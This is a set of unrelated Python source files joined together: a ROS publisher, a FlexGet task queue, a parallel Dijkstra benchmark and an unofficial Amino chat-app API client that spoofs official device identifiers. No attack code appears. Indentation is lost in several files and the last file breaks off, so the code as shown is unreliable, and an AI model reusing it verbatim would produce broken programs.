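#   client = ACSClient()
#   if client.connect('mgmt.example.com', 'azureuser', port=2200):
#       stdout, stderr = client.run('docker ps')
#       print(stdout.read().decode())
#       # create_tunnel blocks, forwarding localhost:8080 until Ctrl-C
#       client.create_tunnel('leader.mesos', 80, local_port=8080)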
|
debug_publisher.py
|
#!/usr/bin/env python3
import threading
import rospy
from std_msgs.msg import Float64, Int32
from sensor_msgs.msg import JointState
class Control:
n = 0
    def get_keyboard_input(self):
        while True:
            inp = input("type something ")
            # print("key: " + inp)
            if inp == "quit":
                return
            try:
                self.n = int(inp)
            except ValueError:
                print("not a number, ignoring")
def talker(c):
pub = rospy.Publisher('mv', Int32, queue_size=10)
rospy.init_node('mv', anonymous=True)
rate = rospy.Rate(10)
while not rospy.is_shutdown():
cont = c.n
pub.publish(cont)
rate.sleep()
if __name__ == '__main__':
try:
c = Control()
x = threading.Thread(target=c.get_keyboard_input)
x.start()
talker(c)
except rospy.ROSInterruptException:
pass
|
task_queue.py
|
from __future__ import unicode_literals, division, absolute_import
from builtins import * # pylint: disable=unused-import, redefined-builtin
import logging
import queue
import sys
import threading
import time
from sqlalchemy.exc import ProgrammingError, OperationalError
from flexget.task import TaskAbort
log = logging.getLogger('task_queue')
class TaskQueue(object):
"""
Task processing thread.
Only executes one task at a time, if more are requested they are queued up and run in turn.
"""
def __init__(self):
self.run_queue = queue.PriorityQueue()
self._shutdown_now = False
self._shutdown_when_finished = False
self.current_task = None
# We don't override `threading.Thread` because debugging this seems unsafe with pydevd.
# Overriding __len__(self) seems to cause a debugger deadlock.
self._thread = threading.Thread(target=self.run, name='task_queue')
self._thread.daemon = True
def start(self):
self._thread.start()
def run(self):
while not self._shutdown_now:
# Grab the first job from the run queue and do it
try:
self.current_task = self.run_queue.get(timeout=0.5)
except queue.Empty:
if self._shutdown_when_finished:
self._shutdown_now = True
continue
try:
self.current_task.execute()
except TaskAbort as e:
log.debug('task %s aborted: %r' % (self.current_task.name, e))
except (ProgrammingError, OperationalError):
log.critical('Database error while running a task. Attempting to recover.')
self.current_task.manager.crash_report()
except Exception:
log.critical('BUG: Unhandled exception during task queue run loop.')
self.current_task.manager.crash_report()
finally:
self.run_queue.task_done()
self.current_task = None
remaining_jobs = self.run_queue.qsize()
if remaining_jobs:
log.warning('task queue shut down with %s tasks remaining in the queue to run.' % remaining_jobs)
else:
log.debug('task queue shut down')
def is_alive(self):
return self._thread.is_alive()
def put(self, task):
"""Adds a task to be executed to the queue."""
self.run_queue.put(task)
def __len__(self):
return self.run_queue.qsize()
def shutdown(self, finish_queue=True):
"""
Request shutdown.
:param bool finish_queue: Should all tasks be finished before ending thread.
"""
log.debug('task queue shutdown requested')
if finish_queue:
self._shutdown_when_finished = True
if self.run_queue.qsize():
log.verbose('There are %s tasks to execute. Shutdown will commence when they have completed.' %
self.run_queue.qsize())
else:
self._shutdown_now = True
def wait(self):
"""
Waits for the thread to exit.
Allows abortion of task queue with ctrl-c
"""
if sys.version_info >= (3, 4):
# Due to python bug, Thread.is_alive doesn't seem to work properly under our conditions on python 3.4+
# http://bugs.python.org/issue26793
# TODO: Is it important to have the clean abortion? Do we need to find a better way?
self._thread.join()
return
try:
while self._thread.is_alive():
time.sleep(0.5)
except KeyboardInterrupt:
log.error('Got ctrl-c, shutting down after running task (if any) completes')
self.shutdown(finish_queue=False)
# We still wait to finish cleanly, pressing ctrl-c again will abort
while self._thread.is_alive():
time.sleep(0.5)
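# Minimal usage sketch (hypothetical `task` object: anything with an
# .execute() method, a .name attribute and priority ordering should work,
# since run() pulls from a PriorityQueue):
#
#   tq = TaskQueue()
#   tq.start()
#   tq.put(task)      # tasks execute one at a time, in priority order
#   tq.shutdown()     # let queued tasks finish, then stop the thread
#   tq.wait()         # block until the worker thread exits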
|
dijk_inner_mp.py
|
import random
import time
import sys
import multiprocessing
from multiprocessing import Lock,Process,Semaphore,Barrier,Array,Queue
INT_MAX = multiprocessing.Value('i',1000000000)
#N=multiprocessing.Value('i',16384)
#DEG=multiprocessing.Value('i',16)
#P=multiprocessing.Value('i',2)
q = multiprocessing.Queue()
N1=int(sys.argv[2])
DEG1=int(sys.argv[3])
P1=int(sys.argv[1])
W = [[0 for x in range(DEG1)] for x in range(N1)]
W_index = [[0 for x in range(DEG1)] for x in range(N1)]
u = multiprocessing.Array('i',range(P1))
D = multiprocessing.Array('i',range(N1))
Q = multiprocessing.Array('i',range(N1))
l = [multiprocessing.Lock() for i in range(0,N1)]
INT_MAX1=1000000000
barrier = Barrier(P1)
local_min = multiprocessing.Array('i',range(P1))
def graph():
global W
global W_index
global P
global INT_MAX
global D
global Q
global u
global local_min
global l
for i in range(0,N1):
for j in range(0,DEG1):
W_index[i][j] = i+j
W[i][j] = i+j#random.randint(1,3)+i
if W_index[i][j] >= N1-1 :
W_index[i][j] = N1-1
#W[i][j] = N-1 random.randint(1, 10) + i
if i==i+j:
W[i][j]=0
#print (W[i][j], W_index[i][j])
#print (' ')
def array_init():
for i in range(0,N1):
D[i] = INT_MAX1
Q[i] = 1
D[0] = 0
def do_work(tid,D,Q,N,DEG,P,u):
start_time = time.time()
local_count=N.value
N=N.value
DEG=DEG.value
P=P.value
INT_MAX2=INT_MAX.value
u[tid]=0
i_start = tid*DEG/P
i_stop = (tid+1)*DEG/P
barrier.wait()
while local_count!=0: #outer loop
min1 = INT_MAX2
min_index1 = N-1
for j in range(int(i_start),int(i_stop)): #local_min
if(D[W_index[u[tid]][j]] < min1 and Q[W_index[u[tid]][j]]==1): #inner loop
min1 = D[W_index[u[tid]][j]]
min_index1 = W_index[u[tid]][j]
local_min[tid]=min_index1
barrier.wait() #barrier
if tid==0 :
min2=INT_MAX2
min_index2=N-1
for k in range(0,P):
if D[local_min[k]] < min2 and Q[local_min[k]]==1:
min2 = D[local_min[k]]
min_index2 = local_min[k]
            u[tid] = min_index2
            Q[u[tid]] = 0
barrier.wait()
if tid!=0:
u[tid]=u[0]
for i in range(int(i_start),int(i_stop)):
if(D[W_index[u[tid]][i]] > D[u[tid]] + W[u[tid]][i]):
D[W_index[u[tid]][i]] = D[u[tid]] + W[u[tid]][i] #relax
local_count = local_count - 1
final_time = time.time() - start_time
print ('TID:',tid,'TIME_SEC',final_time)
strr0 = "inner/inner"
strr1 = str(P)
strr11 = str(N)
strr12 = str(DEG)
strr2 = ".out"
strr3 = "-"
strr_final = strr0 + strr3 + strr1 + strr3 + strr11 + strr3 + strr12 + strr2
    with open(strr_final, 'w') as f:
        f.write(str(final_time))
#if tid==0:
# for i in range(0,N):
# print (D[i],Q[i])
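# Sketch of the reduction pattern used in do_work above: each of the P
# workers scans its slice [tid*DEG/P, (tid+1)*DEG/P) of the current vertex's
# adjacency list and records a candidate in local_min[tid]; after the first
# barrier, worker 0 reduces local_min[] to the global minimum and marks that
# vertex visited; after the second barrier, every worker relaxes the edges in
# its own slice against the newly settled vertex u[0].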
def main():
graph()
array_init()
P11 = int(sys.argv[1])
N11 = int(sys.argv[2])
DEG11 = int(sys.argv[3])
    print(P11)
P = multiprocessing.Value('i',P11)
N = multiprocessing.Value('i',N11)
DEG = multiprocessing.Value('i',DEG11)
    processes = []
    for i in range(1, P1):
        p = Process(target=do_work, args=(i, D, Q, N, DEG, P, u))
        p.start()
        processes.append(p)
    do_work(0, D, Q, N, DEG, P, u)
    for p in processes:
        p.join()
if __name__ == "__main__":
main()
|
client.py
|
import json
import base64
import requests
import threading
from uuid import UUID
from os import urandom
from time import timezone, sleep
from typing import BinaryIO
from binascii import hexlify
from time import time as timestamp
from locale import getdefaultlocale as locale
from .lib.util import exceptions, headers, device, objects, helpers
from .socket import Callbacks, SocketHandler
device = device.DeviceGenerator()
class Client(Callbacks, SocketHandler):
def __init__(self, deviceId: str = None, proxies: dict = None, certificatePath = None, socket_trace = False, socketDebugging = False):
self.api = "https://service.narvii.com/api/v1"
self.authenticated = False
self.configured = False
self.user_agent = device.user_agent
if deviceId is not None: self.device_id = deviceId
else: self.device_id = device.device_id
self.device_id_sig = device.device_id_sig
SocketHandler.__init__(self, self, socket_trace=socket_trace, debug=socketDebugging)
Callbacks.__init__(self, self)
self.proxies = proxies
self.certificatePath = certificatePath
self.json = None
self.sid = None
self.userId = None
self.account: objects.UserProfile = objects.UserProfile(None)
self.profile: objects.UserProfile = objects.UserProfile(None)
self.check_device(device.device_id)
def join_voice_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Voice Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def join_video_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Video Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"channelType": 5,
"id": "2154531" # Need to change?
},
"t": 108
}
data = json.dumps(data)
self.send(data)
def join_video_chat_as_viewer(self, comId: str, chatId: str):
data = {
"o":
{
"ndcId": int(comId),
"threadId": chatId,
"joinRole": 2,
"id": "72446"
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def run_vc(self, comId: str, chatId: str, joinType: str):
while self.active:
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
sleep(1)
def start_vc(self, comId: str, chatId: str, joinType: int = 1):
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"channelType": 1,
"id": "2154531" # Need to change?
},
"t": 108
}
data = json.dumps(data)
self.send(data)
self.active = True
        threading.Thread(target=self.run_vc, args=[comId, chatId, joinType]).start()
def end_vc(self, comId: str, chatId: str, joinType: int = 2):
self.active = False
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def login_sid(self, SID: str):
"""
Login into an account with an SID
**Parameters**
- **SID** : SID of the account
"""
uId = helpers.sid_to_uid(SID)
self.authenticated = True
self.sid = SID
self.userId = uId
self.account: objects.UserProfile = self.get_user_info(uId)
self.profile: objects.UserProfile = self.get_user_info(uId)
headers.sid = self.sid
self.start()
self.run_socket()
def login(self, email: str, password: str):
"""
Login into an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"email": email,
"v": 2,
"secret": f"0 {password}",
"deviceID": self.device_id,
"clientType": 100,
"action": "normal",
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/auth/login", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
self.run_socket()
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
self.authenticated = True
self.json = json.loads(response.text)
self.sid = self.json["sid"]
self.userId = self.json["account"]["uid"]
self.account: objects.UserProfile = objects.UserProfile(self.json["account"]).UserProfile
self.profile: objects.UserProfile = objects.UserProfile(self.json["userProfile"]).UserProfile
headers.sid = self.sid
self.start()
return response.status_code
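    # Minimal usage sketch (hypothetical credentials; assumes
    # objects.UserProfile exposes a .nickname attribute):
    #
    #   client = Client()
    #   client.login("user@example.com", "hunter2")  # starts the socket on success
    #   print(client.profile.nickname)
    #   client.logout()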
def register(self, nickname: str, email: str, password: str, verificationCode: str, deviceId: str = device.device_id):
"""
Register an account.
**Parameters**
- **nickname** : Nickname of the account.
- **email** : Email of the account.
- **password** : Password of the account.
- **verificationCode** : Verification code.
- **deviceId** : The device id being registered to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": deviceId,
"email": email,
"clientType": 100,
"nickname": nickname,
"latitude": 0,
"longitude": 0,
"address": None,
"clientCallbackURL": "narviiapp://relogin",
"validationContext": {
"data": {
"code": verificationCode
},
"type": 1,
"identity": email
},
"type": 1,
"identity": email,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/auth/register", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def restore(self, email: str, password: str):
"""
Restore a deleted account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": device.device_id,
"email": email,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/account/delete-request/cancel", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def logout(self):
"""
Logout from an account.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": self.device_id,
"clientType": 100,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/auth/logout", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
self.authenticated = False
self.json = None
self.sid = None
self.userId = None
            self.account = None
            self.profile = None
headers.sid = None
self.close()
return response.status_code
def configure(self, age: int, gender: str):
"""
Configure the settings of an account.
**Parameters**
- **age** : Age of the account. Minimum is 13.
- **gender** : Gender of the account.
- ``Male``, ``Female`` or ``Non-Binary``
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if gender.lower() == "male": gender = 1
elif gender.lower() == "female": gender = 2
elif gender.lower() == "non-binary": gender = 255
else: raise exceptions.SpecifyType
if age <= 12: raise exceptions.AgeTooLow
data = json.dumps({
"age": age,
"gender": gender,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/persona/profile/basic", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def verify(self, email: str, code: str):
"""
Verify an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"validationContext": {
"type": 1,
"identity": email,
"data": {"code": code}},
"deviceID": device.device_id,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/auth/check-security-validation", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def request_verify_code(self, email: str, resetPassword: bool = False):
"""
        Request a verification code for the targeted email.
**Parameters**
- **email** : Email of the account.
- **resetPassword** : If the code should be for Password Reset.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"identity": email,
"type": 1,
"deviceID": device.device_id
}
if resetPassword is True:
data["level"] = 2
data["purpose"] = "reset-password"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/auth/request-security-validation", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def activate_account(self, email: str, code: str):
"""
Activate an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"type": 1,
"identity": email,
"data": {"code": code},
"deviceID": device.device_id
})
response = requests.post(f"{self.api}/g/s/auth/activate-email", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
# Provided by "𝑰 𝑵 𝑻 𝑬 𝑹 𝑳 𝑼 𝑫 𝑬#4082"
def delete_account(self, password: str):
"""
Delete an account.
**Parameters**
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": device.device_id,
"secret": f"0 {password}"
})
response = requests.post(f"{self.api}/g/s/account/delete-request", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def change_password(self, email: str, password: str, code: str):
"""
Change password of an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"updateSecret": f"0 {password}",
"emailValidationContext": {
"data": {
"code": code
},
"type": 1,
"identity": email,
"level": 2,
"deviceID": device.device_id
},
"phoneNumberValidationContext": None,
"deviceID": device.device_id
})
response = requests.post(f"{self.api}/g/s/auth/reset-password", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
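    # Sketch of a password reset with placeholder values; the code comes from
    # the email requested with resetPassword=True:
    #
    #   client.request_verify_code(email="user@example.com", resetPassword=True)
    #   client.change_password(email="user@example.com", password="newPassword", code="123456")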
def check_device(self, deviceId: str):
"""
Check if the Device ID is valid.
**Parameters**
- **deviceId** : ID of the Device.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": deviceId,
"bundleID": "com.narvii.amino.master",
"clientType": 100,
"timezone": -timezone // 1000,
"systemPushEnabled": True,
"locale": locale()[0],
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/device", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: self.configured = True; return response.status_code
def get_account_info(self):
response = requests.get(f"{self.api}/g/s/account", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfile(json.loads(response.text)["account"]).UserProfile
def upload_media(self, file: BinaryIO, fileType: str):
"""
Upload file to the amino servers.
**Parameters**
            - **file** : File to be uploaded.
            - **fileType** : Type of the file.
                - ``audio`` or ``image``
**Returns**
- **Success** : Url of the file uploaded to the server.
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if fileType == "audio":
t = "audio/aac"
elif fileType == "image":
t = "image/jpg"
else: raise exceptions.SpecifyType(fileType)
data = file.read()
response = requests.post(f"{self.api}/g/s/media/upload", data=data, headers=headers.Headers(type=t, data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["mediaValue"]
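    # A minimal sketch, assuming a local file path (illustrative only). The
    # returned URL can be passed to methods that accept media URLs, e.g.
    # edit_chat(backgroundImage=...):
    #
    #   with open("picture.jpg", "rb") as f:
    #       url = client.upload_media(f, fileType="image")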
def handle_socket_message(self, data):
return self.resolve(data)
def get_eventlog(self):
response = requests.get(f"{self.api}/g/s/eventlog/profile?language=en", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)
def sub_clients(self, start: int = 0, size: int = 25):
"""
List of Communities the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if not self.authenticated: raise exceptions.NotLoggedIn()
response = requests.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["communityList"]).CommunityList
def sub_clients_profile(self, start: int = 0, size: int = 25):
if not self.authenticated: raise exceptions.NotLoggedIn()
response = requests.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["userInfoInCommunities"]
def get_user_info(self, userId: str):
"""
        Information of a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`User Object <amino.lib.util.objects.UserProfile>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfile(json.loads(response.text)["userProfile"]).UserProfile
def get_chat_threads(self, start: int = 0, size: int = 25):
"""
List of Chats the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Chat List <amino.lib.util.objects.ThreadList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/chat/thread?type=joined-me&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.ThreadList(json.loads(response.text)["threadList"]).ThreadList
def get_chat_thread(self, chatId: str):
"""
        Get the Chat Object from a Chat ID.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : :meth:`Chat Object <amino.lib.util.objects.Thread>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/chat/thread/{chatId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Thread(json.loads(response.text)["thread"]).Thread
def get_chat_users(self, chatId: str, start: int = 0, size: int = 25):
response = requests.get(f"{self.api}/g/s/chat/thread/{chatId}/member?start={start}&size={size}&type=default&cv=1.2", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["memberList"]).UserProfileList
def join_chat(self, chatId: str):
"""
        Join a Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def leave_chat(self, chatId: str):
"""
        Leave a Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def start_chat(self, userId: [str, list], message: str, title: str = None, content: str = None, isGlobal: bool = False, publishToGlobal: bool = False):
"""
        Start a Chat with a User or List of Users.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **message** : Starting Message.
- **title** : Title of Group Chat.
- **content** : Content of Group Chat.
- **isGlobal** : If Group Chat is Global.
- **publishToGlobal** : If Group Chat should show in Global.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType
data = {
"title": title,
"inviteeUids": userIds,
"initialMessageContent": message,
"content": content,
"timestamp": int(timestamp() * 1000)
}
if isGlobal is True: data["type"] = 2; data["eventSource"] = "GlobalComposeMenu"
else: data["type"] = 0
if publishToGlobal is True: data["publishToGlobal"] = 1
else: data["publishToGlobal"] = 0
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/chat/thread", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
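    # Usage sketch with placeholder IDs; userId accepts a single ID or a list:
    #
    #   client.start_chat(userId="user-id", message="hi")
    #   client.start_chat(userId=["id-1", "id-2"], message="hi", title="Group", content="About us")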
def invite_to_chat(self, userId: [str, list], chatId: str):
"""
Invite a User or List of Users to a Chat.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType
data = json.dumps({
"uids": userIds,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/invite", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def kick(self, userId: str, chatId: str, allowRejoin: bool = True):
        allowRejoin = 1 if allowRejoin else 0
response = requests.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{userId}?allowRejoin={allowRejoin}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def get_chat_messages(self, chatId: str, size: int = 25, pageToken: str = None):
"""
        List of Messages from a Chat.
**Parameters**
- **chatId** : ID of the Chat.
            - *size* : Size of the list.
- *pageToken* : Next Page Token.
**Returns**
- **Success** : :meth:`Message List <amino.lib.util.objects.MessageList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if pageToken is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&pageToken={pageToken}&size={size}"
else: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&size={size}"
response = requests.get(url, headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetMessages(json.loads(response.text)).GetMessages
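    # Pagination sketch with a placeholder chat ID; the nextPageToken attribute
    # of the returned objects.GetMessages is assumed here:
    #
    #   page = client.get_chat_messages(chatId="chat-id", size=100)
    #   older = client.get_chat_messages(chatId="chat-id", size=100, pageToken=page.nextPageToken)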
def get_message_info(self, chatId: str, messageId: str):
"""
        Information of a Message from a Chat.
**Parameters**
- **chatId** : ID of the Chat.
            - **messageId** : ID of the Message.
**Returns**
- **Success** : :meth:`Message Object <amino.lib.util.objects.Message>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Message(json.loads(response.text)["message"]).Message
def get_community_info(self, comId: str):
"""
        Information of a Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : :meth:`Community Object <amino.lib.util.objects.Community>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s-x{comId}/community/info?withInfluencerList=1&withTopicList=true&influencerListOrderStrategy=fansCount", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Community(json.loads(response.text)["community"]).Community
def search_community(self, aminoId: str):
"""
        Search a Community by its Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Community.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/search/amino-id-and-link?q={aminoId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
response = json.loads(response.text)["resultList"]
if len(response) == 0: raise exceptions.CommunityNotFound(aminoId)
else: return objects.CommunityList([com["refObject"] for com in response]).CommunityList
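    # A minimal sketch; the argument is the vanity Amino ID from a community
    # URL (placeholder shown), not a numeric comId. Raises CommunityNotFound
    # when nothing matches:
    #
    #   communities = client.search_community("aminoId-here")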
def get_user_following(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that the User is Following.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/joined?start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
